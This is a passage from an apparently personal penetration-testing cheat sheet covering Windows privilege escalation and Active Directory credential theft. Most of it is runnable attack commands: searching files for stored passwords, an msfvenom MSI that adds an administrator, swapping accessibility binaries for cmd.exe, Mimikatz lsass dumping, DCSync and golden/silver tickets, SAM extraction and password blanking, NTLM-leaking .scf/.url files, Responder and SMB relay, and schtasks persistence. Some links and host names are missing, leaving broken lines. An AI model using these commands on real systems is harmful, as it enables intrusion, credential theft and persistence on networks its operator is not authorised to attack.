      • prohibit access to AD sysvol’s shares to all users and allow access only for computers
      • apply policy’s and immediately remove them from AD’s sysvol shares
      • ???!!! to be improved
  • administrators may forget some configuration files with credentials:
    files: unattend.xml, sysprep.inf, sysprep.xml
    at locations: C:\, C:\Windows\Panther\, C:\Windows\Panther\Unattend\, C:\Windows\System32\, C:\Windows\System32\sysprep\, other random places in file system
    or metasploit module: post/windows/gather/enum_unattend

    Search for stored credentials (windows priv. esc. for pentesters):

    dir c:\*vnc.ini /s /b /c
    dir c:\*ultravnc.ini /s /b /c
    dir c:\ /s /b /c | findstr /si *vnc.ini
    findstr /si password *.txt | *.xml | *.ini
    findstr /si pass *.txt | *.xml | *.ini
  • netview - enumerates systems using WinAPI calls

Windows privilege escalation



Scanning scripts:

  • Service related weaknesses: service parameters access, service folder access, unquoted paths at service,
    exploit/windows/local/service_permissions - metasploit module, to exploit weak service’s path and access configuration (to elevate through services)
    accesschk.exe -uwcqv "test_user" *, accesschk.exe -ucqv upnphost
  • PowerUp - tool will query a victim machine in order to identify what privilege escalation vectors are present
    it is now part of PowershellEmpire, module: powershell/privesc/powerup/allchecks
  • BeRoot - tool to check common Windows misconfigurations
  • windows-privesc-check (pentestmonkey) (.exe and .py) - script for detecting opportunities for privilege escalation
  • DLL hijacking

    Dynamic-Link Library Search Order
    Dynamic-Link Library Security
    general dll search order:

    • application’s load directory
    • C:\Windows\System32
    • C:\Windows
    • current directory
    • PATH environment
  • task scheduller (at) (works under Windows 2000, XP, 2003)

Repositories with windows exploits:

some technics

  • AlwaysInstallElevated - if this is enabled, then any .msi installer will be launched with SYSTEM privileges. Check BOTH this registry keys:

    • reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
    • reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated

    However for msi installation the GUI-session must be associated (in case user is not logged in (no gui-session) use autostart technics, e.g. echo msiexec /qn /quiet /i c:\users\andrea\my.msi > C:\Users\phonexicum\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\t.bat)

    • msfvenom payload generation: msfvenom -f msi-nouac -p windows/adduser USER=Admin2 PASS=Password -o FILE.msi
    • run meterpreter
    • migrate to process with gui (e.g. explorer.exe)
    • install .msi: msiexec /qn /quiet /log*v i.log /i FILE.msi (/qn - no gui)

    metasploit module: exploit/windows/local/always_install_elevated

  • Services vulnerable to privilege escalation through unquoted paths with spaces ( e.g. C:\Program Files\adobe\update.exe) (explanation: unquoted service paths)
    check all services: wmic service get name,displayname,pathname,startmode |findstr /i "Auto" |findstr /i /v "C:\Windows\\" |findstr /i /v """ (Microsoft Windows Unquoted Service Path Enumeration)
    Microsoft Windows unquoted service path enumeration and fixation

Local (DMA) privilege escalation

DMA - Direct memory access

  • Kon-Boot - boot CD that allows you to easily and quietly bypass password protection. NO permanent changes.
    the only valid installation procedure (to make the installation most universal): At USB 2.0 stick install KonBoot 2.5 or higher using KonBootFLOPPY.img (dd if=/path/to/KonBootFLOPPY.img of=/dev/sdb)
    Windows DMA attacks: gaining SYSTEM shells using a generic patch - how online patching works
  • attacking winlogon.exe. Substitute one of:

    • C:\Windows\System32\sethc.exe (sealing shift key)
    • C:\Windows\System32\Magnify.exe (at logon ease of access -> magnifier)
    • C:\Windows\System32\Utilman.exe (press Win + U)
    • C:\Windows\System32\osk.exe (at logon ease of access -> keyboard) - on-screen keyboard
    • ???

    to c:\windows\system32\cmd.exe (you will become NT AUTHORITY\SYSTEM)

  • chntpw (linux utility) - changes password of a user in a SAM file
  • Windows Login Unlocker - load into live windows and run this program
  • ntpasswd - utility for password reset (bootdisk)
  • Offline Windows Password & Registry Editor

Postexploitation frameworks/tools

  • PowerShell Empire - post-exploitation agent built on cryptologically-secure communications and a flexible architecture (implements the ability to run PowerShell agents without requirement powershell.exe, rapidly deployable post-exploitation modules ranging from key loggers to Mimikatz, and adaptable communications to evade network detection)
    PowershellEmpire usage

    set listenerset payloadlist agents
      uselistener http
      launcher powershell listenername
      usestager windows/http
      set Listener listenername
      interact newname
  • DeathStar - automate getting Domain Admin using Empire
    description by author: Automating the Empire with the Death Star
    статья по использованию: DeathStar: Автоматизация тестирования на проникновение Active Directory

  • PowerSploit - a PowerShell Post-Exploitation Framework
    mimikatz can be changed to up-to-date, by manual swapping DLL encoding

  • Koadic - COM Command & Control - post-exploitation rootkit (similar to Powershell Empire, Meterpreter, …). It does most of its operations using Windows Script Host (a.k.a. JScript/VBScript) (NO PowerShell) (with compatibility to Windows 2000, … Windows 10) (+ compatibility with Python 2 and 3)

  • PowerShellArsenal - module can be used to disassemble managed and unmanaged code, perform .NET malware analysis, analyze/scrape memory, parse file formats and memory structures, obtain internal system information, etc

  • p0wnedShell

  • WCE - tool to list Windows logon sessions and add, change, list and delete associated credentials (ex.: LM/NT hashes, plaintext passwords and Kerberos tickets) (good presentation: Post-Exploitation with WCE v1.2)

Credentials/passwords/tickets stealing

PASSWORD HASHES DUMP TOOLS - awesome list of utilities, for extracting credentials/tickets/etc in windows system (memory/credential manager/…)

Bernardo Damele’s blog: Dump windows password hashes efficiently. Bernardo Damele’s tool list:

Cain & Abel, pwdump2, pwdump6, pwdump7, Quarks PwDump, PowerDump, fgdump, PWDumpX, gsecdump, secretsdump, carrot, Metasploit smart_hashdump (post module), Metasploit hashdump (post module), Metasploit hashdump (script), Metasploit hashdump (command), mimikatz, pwhist, bkhive / samdump2, creddump by moyix, ntds_dump_hash, NTDSXtract, passcape Windows Password Recovery, pdbedit on Unix/Linux, passcape Network Password Recovery, lsadump2, LSASecretsDump, LSASecretsView, Network Password Recovery (netpass), Metasploit gather/credentials/enum_cred_store (post module), creddump by, Protected Storage PassView (pspv), Metasploit gather/credentials/windows_autologin (post module), Windows Credentials Editor (WCE), Pass-The-Hash Toolkit (PTH), lslsass, RunhAsh, msvctl, incognito, find_token, cachedump, Metasploit gather/cachedump (post module), WirelessKeyView, Metasploit wlan/wlan_profile (post module), vncpwdump, VNCPassView, Metasploit gather/vnc (post module), Metasploit getvncpw (script)

Metasploit’s stealth command execution without writing files to disk. (Use links to install modules into metasploit, they are not preinstalled)

Get credentials from various storages:

  • LaZagne (Linux/Windows) - password recovery tool used to retrieve passwords stored on a local computer. (Supports: CoreFTP, Cyberduck, FileZilla, PuttyCM, WinSCP, Chrome, Firefox, IE, Opera, Jitsi, Pidgin, Outlook, Thunderbird, Tortoise, Wifi passwords and more.)
    laZagne.exe all - run all modules
    laZagne.exe browsers - run only browsers module
  • metasploit post modules to collect credentials through windows system: msf > use post/windows/gather/credentials/ TAB-TAB
  • WebBrowserPassView
  • credgrap_ie_edge (github) (3 powershell lines) - extract stored credentials from Internet Explorer and Edge browsers

      $vault = New-Object Windows.Security.Credentials.PasswordVault
      $vault.RetrieveAll() | % { $_.RetrievePassword();$_ }

Extract windows credentials:

  • Mimikatz - extract plaintexts passwords, hash, PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash, pass-the-ticket, build Golden tickets, play with certificates or private keys, vault, … Unofficial Guide to Mimikatz & Command Reference
    two additional features: mimidrv (driver to interact with the Windows kernal) and mimilib (AppLocker bypass, Auth package/SSP, password filter, and sekurlsa for WinDBG)

    Mimikatz modules:

      * `mimikatz # ::` - list modules
      * `crypto`, `dpapi`, `event`, `kerberos`, `lsadump`, `minesweeper`, `misc`, `net`, `privilege`, `process`, `sekurlsa`, `service`, `sid`, `standard`, `token`, `ts`, `vault`.
      * `busylight`, `sysenv`, `iis`, `rpc`, `sr98` (*RF module for SR98 device and T5577 target*), `rdm` (*RF module for RDM(830 AL) device*)
    • Typical workflow:

      mimikatz # privilege::debug
      mimikatz # sekurlsa::minidump "C:\a\lsass.dmp"
      mimikatz # sekurlsa::wdigest
      mimikatz # sekurlsa::logonpasswords             # dump passwords from current lsass win process
      mimikatz # sekurlsa::credman                    # list credentials manager
      mimikatz # sekurlsa::krbtgt                     # get Domain Kerberos service account (KRBTGT) password data
      sekurlsa::livessp sekurlsa::msv sekurlsa::SSP sekurlsa::tspkg
      vault::list vault::cred
      mimikatz # lsadump::lsa /inject     # all data      # optional: /name:username , e.g. /name:krbtgt
      mimikatz # lsadump::lsa /patch      # ntlm only
      mimikatz # crypto::certificates     # list/export certificates
      mimikatz # misc::cmd        # run cmd after ticket injection or token impersonation
    • special tricks

      • mimikatz under meterpreter example
        run mimikatz in-memory without copying to file system (from inside meterpreter): execute -H -i -c -m -d calc.exe -f /path/to/mimikatz.exe -a '"sekurlsa::logonPasswords full" exit'
      • dumping lsass for offline processing: procdump.exe -accepteula -ma lsass.exe lsass.dmp or Debug Diagnostic Tool
      • PtH: privilege::debug, sekurlsa::pth /user:username /domain:domain /ntlm:ntlm /run:"mstsc /restrictedadmin /v:" (or /rc4:)
    • DCSync Attack - Extracting user password data with mimikatz DCSync
      dcsync requires Administrators, Domain Admins, Enterprise Admins or Domain Controller rights, requires your dns to correctly resolve _ldap._tcp.dc._msdcs.DOMAIN.COM

      • run other mimikatz instance with custom credentials: mimikatz # sekurlsa::pth /user:Administrator /domain:DOMAIN.COM /ntlm:XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX /run:mimikatz.exe
      • leak custom user’s hash: mimikatz # lsadump::dcsync /domain:MYDOMAIN.COM /user:krbtgt

      LSADUMP::NetSync - perform DCSync through DC computer impersonation via a silver ticket

    • Ticket manipulation:

      • create golden ticket: mimikatz # kerberos::golden /domain:MYDOMAIN.COM /sid:S-1-5-21-421115581-889488229-2938181853 /rc4:1dc9bae0282962e7d761a2eda274e6d7 /id:500 /user:ADM_phonexicum /groups:500,501,513,512,520,518,519 /ticket:golden.kirbi /ptt
        /sid - domain sid (mimikatz # lsasump::lsa)
        /rc4://krbtgt: - NTLM hash of domain controller’s krbtgt key (also possible: /aes138:, /aes256:)
          administrator/user name can be any (if it does not exists golden ticket will become invalid in 20 minutes after its creation)
          you can add user’s id into groups id list to obtain additional privileges
      • create silver ticket: mimikatz # kerberos::golden /domain:MYDOMAIN.COM /sid:S-1-5-21-421115581-889488229-2938181853 /rc4:1dc9bae0282962e7d761a2eda274e6d7 /id:500 /user:ADM_phonexicum /groups:500,501,513,512,520,518,519 /target:WS2008R2.MYDOMAIN.COM /service:cifs /ticket:silver.kirbi /ptt
        /target: - target server’s FQDN
        /service: - service’s SPN
        /rc4: - NTLM hash for service (also possible: /aes138:, /aes256:)
      • create trusted tickets
      • manipulate tickets:

        mimikatz # kerberos::list               # list all user tickets (TGT and TGS) in user memory
        mimikatz # sekurlsa::tickets /export    # export tickets
        mimikatz # kerberos::ptt file.kirbi     # inject Kerberos tickets
        mimikatz # kerberos::purge              # clear all tickets
      • Mimikatz Kerberos
    • token manipulation:

      token::list                     # list all tokens of the system
      token::elevate /domainadmin     # impersonate a token with Domain Admin credentials.
      token::elevate                  # impersonate a token. Used to elevate permissions to SYSTEM (default) or find a domain admin token on the box
    • mimikatz # token::elevate # elevate to NT AUTHORITY\SYSTEM

    • bypass Protected Process defense using driver trick:
      Comodo CA: “Timestamping ensures that code will not expire when certificate expires. If your code is timestamped the digital signature is valid even though the certificate has expired. A new certificate is only necessary if you want to sign additional code. If you did not use the timestamping option during the signing, you must re-sign your code and re-send it out to your customers.”

      mimikatz # privilege::debug
      mimikatz # !+
      mimikatz # !processprotect /process:lsass.exe /remove
    • remaining list of the most popular mimikatz commands and related functionality. (mimikatz modules wiki)

      lsadump::sam    # get the SysKey to decrypt SAM entries (from registry or hive). The SAM option connects to the local Security Account Manager (SAM) database and dumps credentials for local accounts. This is used to dump all local credentials on a Windows computer.
      lsadump::trust  # ask LSA Server to retrieve Trust Auth Information (normal or patch on the fly). Dumps trust keys (passwords) for all associated trusts (domain/forest).
      misc::AddSid – Add to SIDHistory to user account. The first value is the target account and the second value is the account/group name(s) (or SID). Moved to SID:modify as of May 6th, 2016.
      misc::MemSSP – Inject a malicious Windows SSP to log locally authenticated credentials.
      misc::Skeleton – Inject Skeleton Key into LSASS process on Domain Controller. This enables all user authentication to the Skeleton Key patched DC to use a “master password” (aka Skeleton Keys) as well as their usual password.
      sekurlsa::Ekeys – list Kerberos encryption keys
      sekurlsa::kerberos – List Kerberos credentials for all authenticated users (including services and computer account)
      sekurlsa::tickets – Lists all available Kerberos tickets for all recently authenticated users, including services running under the context of a user account and the local computer’s AD computer account. Unlike kerberos::list, sekurlsa uses memory reading and is not subject to key export restrictions. sekurlsa can access tickets of others sessions (users).
  • kekeo - a little toolbox to play with Microsoft Kerberos

    Kekeo modules (list modules: kekeo # ::):

    • tgt - ask, pac, asreq, deleg
    • tgs - ask, s4u, renew
    • exploit::ms14068, exploit::ms11013, exploit::cve20177494 (sambacry)
    • misc::changepw - change user password, misc::convert - convert tickets, misc::storm - Kerberos storm, misc::arch
      kekeo # misc::convert ccache golden.kirbi
    • kerberos::ppt - pass-the-ticket, kerberos::list - list tickets, kerberos::purge - purge tickets, kerberos::ask - ask or get TGS tickets
    • smb::time - get time from remote smb server
    • ntlm::netntlm, ntlm::http
    • tsssp::server, tsssp::client, tsssp::list
  • quarkspwdump - dump various types of Windows credentials without injecting in any process

  • Internal Monologue Attack - attack to steal user’s hashes based on: disable (require admin rights) protections (LMCompatibilityLevel, NTLMMinClientSec, RestrictSendingNTLMTraffic), initiate connection to localhost, get nonce and corresponding enc(nonce) and brute DES to obtain user’s hash

  • SAMInside – extract window’s passwords hashes and brute them
  • HashSuite - windows program to test security of password hashes

Cracking hashes:

hashcat, JohnTheRipper, Ophcrack, …

Sensitive data locations:

  • lsass.exe - a process that contains logins, passwords and their hashes stored for logged in users (locally, remotely, anyhow)

    • dumping lsass (local admin required): procdump.exe -accepteula -ma lsass.exe lsass.dump
    • alternative tools: Debug Diagnostic Tool
      adplus/windbg .dump command, taskmanager, process explorer, Windows Error Reporting (WER)
    • system call: MiniDumpWriteDump
  • SAM, SYSTEM - %SystemRoot%\system32\config\SAM hive of the registry (SAM is encrypted with SysKey stored at %SystemRoot%\system32\config\SYSTEM)
    SAM - Security Accounts Management

    • from registry: reg save HKLM\SAM C:\temp\sam.dmp /y reg save HKLM\SECURITY C:\temp\security.dmp /y reg save HKLM\SYSTEM C:\temp\system.dmp /y
      root@kali# samdump2 system.dmp sam.dmp
    • backup locations:
      X:\Backups\ (generated by NTbackup or Wbadmin)
    • shadow copying - check vssown script

    patching SAM file: chntpw [options] SAM SYSTEM SECURITY

    Manual SAM file manipulation through regedit (never tried this instructions):
    • regedit HKEY_LOCAL_MACHINE -> load hive (C:\Windows\System32\config\SAM) (you can write any name)
    • find your username’s rid in HKEY_LOCAL_MACHINE\any\SAM\Domains\Account\Users\Names
    • dropping the password:

      For general account:

      • disable account’s password: in user’s rid block change key V value at positions 0x00A0 and 0x00AC to zero.
      • enable account: in user’s rid block change key F value at positions 0x038 to 10 and 0x039 to 02.

      For Microsoft’s LiveID account:

      • follow the steps for general account
      • delete registry keys: CachedLogonInfo, InternetProviderGUID, InternetSID, InternetUID, InternetUserName
  • NTDS.dit - Active Directory data store (tree) (Как устроен ntds.dit? (хабр))
    default location is %SystemRoot%\NTDS\Ntds.dit (backup: %SystemRoot%\System32\Ntds.dit), but it can be configured (during the process of promoting a domain controller) (see HKLM\SYSTEM\CurrentControlSet\Services\NTDS\Parameters)


  • popularized exploits

  • some metasploit exploits:

    • Kerberos enum users: auxiliary/gather/kerberos_enumusers
  • (pass-the-ticket kerberos exploitation) MS14-068 (CVE-2014-6324) - vulnerability to get a Kerberos ticket for an existing domain user account with the privileges of the following domain groups: domain users (513), domain admins (512), schema admins (518), enterprise admins (519), group policy creator owners (520).
      generate ticket: python -u -p MyPassword -s S-1-5-21-421115581-889488229-2938181853-1131 -d
      inject ticket: mimikatz.exe "Kerberos::ptc"

  • Some exploits from



Interesting scripts:

  • PowerDNS - deliver powershell over DNS TXT records (PoC)


  • gpresult /H file.html - dump the resultant Group Policy for computer (works even if GUI gpresult blocked out)

Adding yourself to autostart:

  • schtasks
  • C:\Users\phonexicum\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\
  • reg query HKLM\software\microsoft\windows\currentversion\run

Windows native API allows to end file with spaces (WinNativeIO)

Bypass security mechanisms

Honeypot-like/MITM tools

  • Leak-NTLM-hash-via-HTML
  • .scf trick () and file:// in xxx.url file trick
    more tricks with files/formats: .scf, .LNK, .URL, desktop.ini, Icon URL, msoffice xml sources,

    use metasploit’s module auxiliary/server/capture/smb to caught ntlm hashes (open spoiler for samples)

    • xxx.scf. Leave file on public share and wait users to visit the directory (after opening, user’s explorer will authorize to you with ntlm hash):
      (article (ADV170014 NTLM SSO: exploitation guide))

    • xxx.url. Leave file on public share (or send file to user) and wait users to visit the directory (after opening, user’s explorer will authorize to you with ntlm hash):


      positions for malicious substitutions:

      • IconFile=\\\samba\cat.ico - user NON-interactive (normal: IconFile=C:\Windows\System32\shell32.dll)
      • URL=file:// - user interactive (user must open the link) (normal: URL=
      • BASEURL=file:// - ???
    • desktop.ini - ???

      InfoTip=POC for dekstop redirect to
    • <Relationship Id="rId1" Type="" Target="\\\aaa" TargetMode="External"/>

MITM tools:

  • responder (kali) - a LLMNR, NBT-NS and MDNS poisoner, with built-in HTTP/SMB/MSSQL/FTP/LDAP rogue authentication server supporting NTLMv1/NTLMv2/LMv2, Extended Security NTLMSSP and Basic HTTP authentication
    easy choice: responder -I eth0 -fwvr --lm, logs: /usr/share/responder/logs/
    responder is based on netbios name spoofing (it answers for all netbios-ns requests), etc.
    responder listens for a lot of protocols: SQL, SMB, Kerberos, FTP, POP, SMTP, IMAP, HTTP, HTTPS, DNS, LDAP, responder is a honeypot-like tool, which must be run at a separate machine
  • auxiliary/server/capture/smb metasploit module for capturing netNTLM authentication attempts

  • smb relay:

    • smb relay attack enables attacker to MITM between client and arbitrary server in order to authenticate to a server as user and perform custom actions (e.g. access files, execute command)
      • exploits/windows/smb/smb_relay metasploits’ module for command execution
      • smbrelayx (impacket package) - SMB RELAY (MITM) attack
        ./ -h -e whoami.exe
    • nccgroup/chuckle (github) - an automated SMB relay exploitation script (can be dangerous for target and result in DoS)
    • NtlmRelayToEWS - ntlm relay attack to Exchange Web Services
  • smbetray - a PoC to demonstrate the ability of an attacker to intercept and modify insecure SMB connections, as well as compromise some secured SMB connections if credentials are known.
  • GP_Hijack - group policy hijack
  • seth - perform a MitM attack (arp-spoofing of two targets) and extract clear text credentials from RDP connections

Set up proxy from command line:

  • Windows XP: proxycfg –p or proxycfg –u (pulls config from IE)
  • Vista+: netsh winhttp set proxy or netsh winhttp import proxy ie (pulls config from IE)
  • HKLM\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings ProxySettingsPerUser (DWORD)
    0 - System Wide, 1 - Per User


Setting up testbed (cheatsheet)

Setting up ActiveDirectory domain:

Enable schedulled tasks using domain account:

  • schtasks /create /tn leak_creds /sc minute /mo 1 /s /ru dd\phonexicum /rp Password /tr C:\windows\system32\whoami.exe
  • “Logon as a batch job” required for selected domain user: granting logon as batch privilege
  • schtasks leak credentials in plaintext to lsass

Interesting articles

awesome articles

to be analyzed



I will just leave it here